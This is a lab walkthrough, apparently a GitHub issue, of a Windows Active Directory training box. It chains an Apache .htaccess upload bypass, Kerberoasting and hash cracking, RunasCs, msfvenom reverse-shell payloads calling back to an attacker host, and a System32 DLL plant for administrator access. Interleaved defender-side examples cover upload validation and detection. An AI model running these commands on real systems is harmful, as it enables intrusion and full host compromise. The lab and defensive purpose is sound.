Open WDavid404 opened 1 month ago
```text
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
88/tcp open kerberos-sec? syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: access.offsec0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl? syn-ack ttl 125
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open unknown syn-ack ttl 125
49668/tcp open unknown syn-ack ttl 125
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open unknown syn-ack ttl 125
49677/tcp open unknown syn-ack ttl 125
49704/tcp open unknown syn-ack ttl 125
49795/tcp open unknown syn-ack ttl 125
```
dig axfr @192.168.211.187 -->
```text
; <<>> DiG 9.19.21-1+b1-Debian <<>> axfr @192.168.211.187
; (1 server found)
;; global options: +cmd
. 85731 IN NS h.root-servers.net.
. 85731 IN NS d.root-servers.net.
. 85731 IN NS a.root-servers.net.
. 85731 IN NS l.root-servers.net.
. 85731 IN NS g.root-servers.net.
. 85731 IN NS c.root-servers.net.
. 85731 IN NS i.root-servers.net.
. 85731 IN NS e.root-servers.net.
. 85731 IN NS j.root-servers.net.
. 85731 IN NS m.root-servers.net.
. 85731 IN NS k.root-servers.net.
. 85731 IN NS b.root-servers.net.
. 85731 IN NS f.root-servers.net.
h.root-servers.net. 86399 IN A 198.97.190.53
f.root-servers.net. 85731 IN A 192.5.5.241
;; Query time: 96 msec
;; SERVER: 192.168.211.187#53(192.168.211.187) (UDP)
;; WHEN: Wed Aug 07 20:47:57 EDT 2024
;; MSG SIZE rcvd: 284
```
--> no info
ldapsearch -H ldap://192.168.211.187 -x -s base namingcontexts -->
```text
dn:
namingcontexts: DC=access,DC=offsec
namingcontexts: CN=Configuration,DC=access,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=access,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=access,DC=offsec
```
ldapsearch -H ldap://192.168.211.187 -x -b"DC=access,DC=offsec"
source code --> TheEvent - v4.6.0
ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.221.187/FUZZ --> no info
Click the "Send Message" button.
Buy a ticket. Try uploading a PHP file.
Uploading a file with a php.gif extension works: we can find the file under /uploads/, but we cannot execute it.
After some tries, I found that apart from known script extensions like ".php" and ".php4", I was able to upload files with my own extension such as ".xxx". But the server didn't render the shell at all for the unknown extension; it just printed out the source code.
Solution: the server is Apache, so we could potentially upload a ".htaccess" file to the directory to make the server treat my ".xxx" extension as a PHP script. Refer to this video (https://www.youtube.com/watch?v=xZd1JWmLGLk).
echo "AddType application/x-httpd-php .xxx" > .htaccess
and upload the .htaccess file.
Change the reverse shell PHP (Ivan Sincek) from .php to .xxx, and upload it.
Access /uploads/
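The upload bypass above works because the site checks file names against a blocklist of known script extensions, so anything it has not heard of (".xxx", and the ".htaccess" that tells Apache what ".xxx" means) sails through. The following is an added example from the defender's side, not code from the writeup or from the TheEvent application: it puts the blocklist check beside an allowlist check and shows which of a constructed set of file names each one accepts. All file names and the helper names (`weak_accepts`, `strong_accepts`, `stored_name`) are assumptions made for the illustration.

```python
import os
import re
import secrets

# Constructed sample of names an upload form might receive (hypothetical).
SAMPLE_UPLOADS = [
    "ticket.png",
    "photo.jpg",
    "shell.php",
    "shell.php4",
    "shell.xxx",         # unknown extension, later mapped to PHP via .htaccess
    ".htaccess",         # per-directory Apache config, no extension at all
    "image.php.gif",     # double extension
    "../../etc/passwd",  # path traversal in the client-supplied name
]

# Weak check of the kind the writeup describes: a blocklist of script
# extensions. Anything not on the list, including ".xxx" and ".htaccess",
# is accepted.
BLOCKED_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml"}


def weak_accepts(filename: str) -> bool:
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED_EXTENSIONS


# Hardened check: only allowlisted image extensions, no path components,
# no dotfiles, and a stem that cannot smuggle a second extension.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def strong_accepts(filename: str) -> bool:
    base = os.path.basename(filename)
    if base != filename:          # "../" or other path components present
        return False
    if base.startswith("."):      # rejects .htaccess and other dotfiles
        return False
    stem, ext = os.path.splitext(base)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False
    return SAFE_STEM.match(stem) is not None   # rejects "image.php" stems


def stored_name(filename: str) -> str:
    """Name to use on disk: a server-generated stem plus the allowlisted
    extension, so the client never chooses what ends up under /uploads/."""
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(8) + ext


def triage(names):
    """Return {name: (weak_verdict, strong_verdict)} for a list of names."""
    return {n: (weak_accepts(n), strong_accepts(n)) for n in names}


if __name__ == "__main__":
    for name, (weak, strong) in triage(SAMPLE_UPLOADS).items():
        print(f"{name:20s} blocklist={'accept' if weak else 'reject':6s} allowlist={'accept' if strong else 'reject'}")
```

The file-name check is only half of the fix. The ".htaccess" trick works at all because Apache honours per-directory overrides inside the upload directory; setting `AllowOverride None` for that directory and switching the PHP engine off there (`php_admin_flag engine off` with mod_php, or removing the PHP handler for that path) means that even a misnamed upload is served as a static file, independently of what the application validates.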
It's an Active Directory machine, so we could look for some AD credentials… or we could make some.
We will start by getting a Service Principal Name. Use Get-SPN.ps1 (https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1)
Now that we have the SPN, we are able to request a ticket and store it in memory with the end goal of getting its hash. Two commands request the ticket and store it in memory:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/DC.access.offsec'
Extracting the hash can also be done with a handy PowerShell Empire script that engages Kerberos. [kali] wget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1
Import-Module Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | Out-File -Encoding ascii hashes.txt
Crack the hash:
hashcat -m 13100 --force -a 0 svc_mssql.kerberoast /usr/share/wordlists/rockyou.txt
--> trustno1
--> didn't work
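The ticket request above leaves a trace on the domain controller: every service ticket request is logged as Security Event ID 4769, and a hash that hashcat mode 13100 can crack is an RC4-HMAC ticket (encryption type 0x17), which modern accounts rarely need. A burst of RC4 service-ticket requests for several user-account SPNs from one requester is the classic Kerberoasting signature. The block below is an added detection example, not part of the writeup and not any vendor's rule: it runs that logic over a few constructed, simplified one-line renderings of 4769 events (real events are EVTX/XML; the field names follow the 4769 schema, the values are made up). The threshold, window and the `detect_kerberoast` name are assumptions for the illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one 4769 event per line, timestamp first, then
# key=value fields named as in the Windows 4769 event schema. The accounts,
# SPNs and addresses are invented for this example.
SAMPLE_4769 = """\
2024-08-07T20:50:01 EventID=4769 TargetUserName=alice@ACCESS.OFFSEC ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=192.168.211.50 Status=0x0
2024-08-07T20:50:03 EventID=4769 TargetUserName=bob@ACCESS.OFFSEC ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=192.168.211.51 Status=0x0
2024-08-07T20:51:10 EventID=4769 TargetUserName=webuser@ACCESS.OFFSEC ServiceName=svc_mssql TicketEncryptionType=0x17 IpAddress=192.168.211.187 Status=0x0
2024-08-07T20:51:11 EventID=4769 TargetUserName=webuser@ACCESS.OFFSEC ServiceName=svc_apache TicketEncryptionType=0x17 IpAddress=192.168.211.187 Status=0x0
2024-08-07T20:51:12 EventID=4769 TargetUserName=webuser@ACCESS.OFFSEC ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=192.168.211.187 Status=0x0
2024-08-07T20:55:00 EventID=4769 TargetUserName=alice@ACCESS.OFFSEC ServiceName=svc_mssql TicketEncryptionType=0x17 IpAddress=192.168.211.50 Status=0x0
"""

RC4_HMAC = "0x17"            # etype 23, the only type hashcat -m 13100 cracks
THRESHOLD = 3                # distinct user SPNs per requester (assumed tuning)
WINDOW = timedelta(minutes=5)


def parse_4769(line: str) -> dict:
    """Turn one constructed log line into a dict; 'ts' holds the timestamp."""
    ts_str, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = datetime.fromisoformat(ts_str)
    return fields


def is_rc4_user_spn_request(ev: dict) -> bool:
    """Successful RC4 ticket for a service run under a user account.
    Computer accounts (name ends in $) and krbtgt are not roastable targets."""
    svc = ev["ServiceName"]
    return (
        ev["EventID"] == "4769"
        and ev["TicketEncryptionType"].lower() == RC4_HMAC
        and ev["Status"] == "0x0"
        and svc != "krbtgt"
        and not svc.endswith("$")
    )


def detect_kerberoast(log_text: str, threshold: int = THRESHOLD, window: timedelta = WINDOW) -> list:
    """Alert once per (requester, source IP) that obtains RC4 tickets for at
    least `threshold` distinct user SPNs inside a sliding `window`."""
    events = [parse_4769(l) for l in log_text.splitlines() if l.strip()]
    per_requester = defaultdict(list)
    for ev in events:
        if is_rc4_user_spn_request(ev):
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)

    alerts = []
    for (user, ip), evs in per_requester.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            in_window = [e for e in evs[i:] if e["ts"] - first["ts"] <= window]
            spns = sorted({e["ServiceName"] for e in in_window})
            if len(spns) >= threshold:
                alerts.append({"requester": user, "ip": ip, "spns": spns, "start": first["ts"]})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(SAMPLE_4769):
        print(f"Kerberoast suspected: {a['requester']} from {a['ip']} "
              f"requested RC4 tickets for {', '.join(a['spns'])} starting {a['start']}")
```

Even a single RC4 ticket for an account that supports AES is worth a look, since the tooling on this page asks for RC4 specifically to get a crackable hash. The preventive side is cheaper than the detective side: a service account whose password is "trustno1" falls in seconds, while a gMSA or a long random password makes the ticket useless even when it is obtained.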
We should use the RunasCs script: https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1 (RunasCs is a utility to run specific processes with different permissions than the user's current logon provides, using explicit credentials.)
Import the module first: Import-Module ./Invoke-RunasCs.ps1
Try it: Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
[kali] msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=445 -f exe > shell.exe
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "C:/users/public/shell.exe"
Use this tool (SeManageVolumeExploit.exe) for SeManageVolumePrivilege
Now we can write to the C: drive.
The general idea is that the attacker can leverage this particular privilege with the exploit to get full control over "C:\", and then craft a ".dll" file and place it somewhere under "C:\Windows\System32\" to trigger the payload as root.
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=6666 -f dll -o tzres.dll
Place the DLL as C:\Windows\System32\wbem\tzres.dll and then run the systeminfo command --> we get a reverse shell.
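What makes the last step work is not a bug in systeminfo but a write where no write should be possible: normally only TrustedInstaller can add files under C:\Windows\System32, and SeManageVolumePrivilege is what let the service account change that. A DLL that appears under System32 (here in the wbem subdirectory) without a servicing event is therefore a high-value signal on its own. The block below is an added defender-side example, not code from the writeup or from any tool it names: it baselines the DLLs under a directory by SHA-256 and reports files that were added or changed, demonstrated on a temporary directory that stands in for System32 (the file names in the scenario are constructed; `build_manifest`, `diff_manifest` and `demo` are assumed names).

```python
import hashlib
import tempfile
from pathlib import Path

# Only DLLs are tracked here; extend the tuple for .exe/.sys if wanted.
WATCHED_SUFFIXES = (".dll",)


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map every watched file under root (relative POSIX path) to its SHA-256."""
    manifest = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES:
            manifest[p.relative_to(root).as_posix()] = sha256_of(p)
    return manifest


def diff_manifest(baseline: dict, current: dict) -> dict:
    """DLLs that appeared, vanished or changed hash since the baseline.
    A patch cycle legitimately produces 'modified' entries; an 'added' entry
    in a subdirectory such as wbem with no matching servicing event is the
    case to chase."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Constructed scenario: a stand-in for System32 in a temp directory is
    baselined, then the DLL drop from the writeup is simulated with a
    placeholder file (not a real DLL) and one existing file is altered."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wbem").mkdir()
        (root / "wbem" / "wbemcore.dll").write_bytes(b"placeholder, constructed")
        (root / "kernel32.dll").write_bytes(b"placeholder, constructed")
        baseline = build_manifest(root)

        (root / "wbem" / "tzres.dll").write_bytes(b"placeholder, constructed")  # new file
        (root / "kernel32.dll").write_bytes(b"placeholder, changed")            # altered file
        return diff_manifest(baseline, build_manifest(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind:9s}: {files}")
```

In production the baseline would be taken from a known-good image or from the catalog-signed file list rather than from the live host, and the same comparison is what a file-integrity monitor or a Sysmon FileCreate (Event ID 11) rule scoped to System32 gives you continuously. The root cause is fixed separately: SeManageVolumePrivilege (and the other privileges that imply host control) should not be assigned to service accounts at all, and auditing the "Perform volume maintenance tasks" user right on domain members finds the ones that are.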
The community has rated it ‘Very Hard’.
Keypoints:
- For an Apache server, we can upload a .htaccess file to define our own file extension: echo "AddType application/x-httpd-php .xxx" > .htaccess
- Get a Service Principal Name --> use Get-SPN.ps1 (https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1)
- Invoke-Kerberoast
- RunasCs script: https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1
- [PE] SeManageVolumePrivilege --> use SeManageVolumeExploit.exe, which gives us full control over C:\ --> we made a DLL named tzres.dll: msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=6666 -f dll -o tzres.dll
- Place the DLL as C:\Windows\System32\wbem\tzres.dll --> then run the "systeminfo" command --> tzres.dll will be loaded, so we get a reverse shell as administrator.